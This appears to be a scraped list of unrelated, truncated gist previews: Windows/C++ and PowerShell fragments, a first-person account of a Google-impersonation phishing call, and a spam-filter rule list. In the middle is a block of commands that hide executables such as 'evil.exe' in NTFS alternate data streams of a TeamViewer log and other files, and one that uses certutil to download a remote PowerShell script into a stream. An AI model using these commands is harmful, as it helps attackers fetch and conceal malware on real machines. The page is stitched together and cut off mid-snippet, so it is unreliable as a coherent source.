| A collection of snippets |
| using System; | |
| using System.Collections.Generic; | |
| using System.Linq; | |
| using System.Text; | |
| using System.Threading.Tasks; | |
| using System.Runtime.InteropServices; | |
| using System.Reflection; | |
| using System.Diagnostics; | |
| using System.Threading; | |
| using System.IO; |
| // | |
| // How to locate the WOW64 Callback Table in ntdll.dll | |
| // | |
| // @modexpblog | |
| // | |
| #define PHNT_VERSION PHNT_VISTA | |
| #include <phnt_windows.h> | |
| #include <phnt.h> |
type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"
extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe
certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
| #include <windows.h> | |
| #include <iostream> | |
| #include <sstream> | |
| std::string | |
| GetSymbolServerURL( | |
| const std::string& moduleName | |
| ) | |
| { | |
| /* Extract timestamp and image size from a module |
g.co, Google's official URL shortcut (update: or Google Workspace's domain verification, see bottom), is compromised. People are actively having their Google accounts stolen.
Someone just tried the most sophisticated phishing attack I've ever seen. I almost fell for it. My mind is a little blown.
Someone named "Chloe" called me from 650-203-0000 with Caller ID saying "Google". She sounded like a real engineer, the connection was super clear, and she had an American accent. Screenshot.
They said that they were from Google Workspace and someone had recently gained access to my account, which they had blocked. They asked me if I had recently logged in from Frankfurt, Germany and I said no.
I asked if they can confirm this is Google calling by emailing me from a Google email and they said sure and sent me this email and told me to look for a case number in it, which I saw in
| #include <stdio.h> | |
| #include <windows.h> | |
| #pragma comment(lib, "winmm.lib") | |
| void Nothing(WORD wKey) | |
| { | |
| } | |
| void PrintKey(WORD wKey) |
| #include <cstdio> | |
| #include <windows.h> | |
| VOID WINAPI TlsCallback(PVOID DllHandle, DWORD Reason, PVOID Reserved) | |
| { | |
| puts("[DynamicLibrary.dll]: TLS Callback"); | |
| } | |
| #ifdef _WIN64 | |
| #pragma comment (linker, "/INCLUDE:_tls_used") |
| function Get-KerberosAESKey | |
| { | |
| <# | |
| .SYNOPSIS | |
| Generate Kerberos AES 128/256 keys from a known username/hostname, password, and kerberos realm. The | |
| results have been verified against the test values in RFC3962, MS-KILE, and my own test lab. | |
| https://tools.ietf.org/html/rfc3962 | |
| https://msdn.microsoft.com/library/cc233855.aspx |
| 1 AC_BR_BONANZA Too many newlines in a row... spammy template | |
| 2 ACCESSDB Message would have been caught by accessdb | |
| 3 ACCT_PHISHING_MANY Phishing for account information | |
| 4 AC_DIV_BONANZA Too many divs in a row... spammy template | |
| 5 AC_FROM_MANY_DOTS Multiple periods in From user name | |
| 6 AC_HTML_NONSENSE_TAGS Many consecutive multi-letter HTML tags, likely nonsense/spam | |
| 7 AC_POST_EXTRAS Suspicious URL | |
| 8 AC_SPAMMY_URI_PATTERNS10 link combos match highly spammy template | |
| 9 AC_SPAMMY_URI_PATTERNS11 link combos match highly spammy template | |
| 10 AC_SPAMMY_URI_PATTERNS12 link combos match highly spammy template |
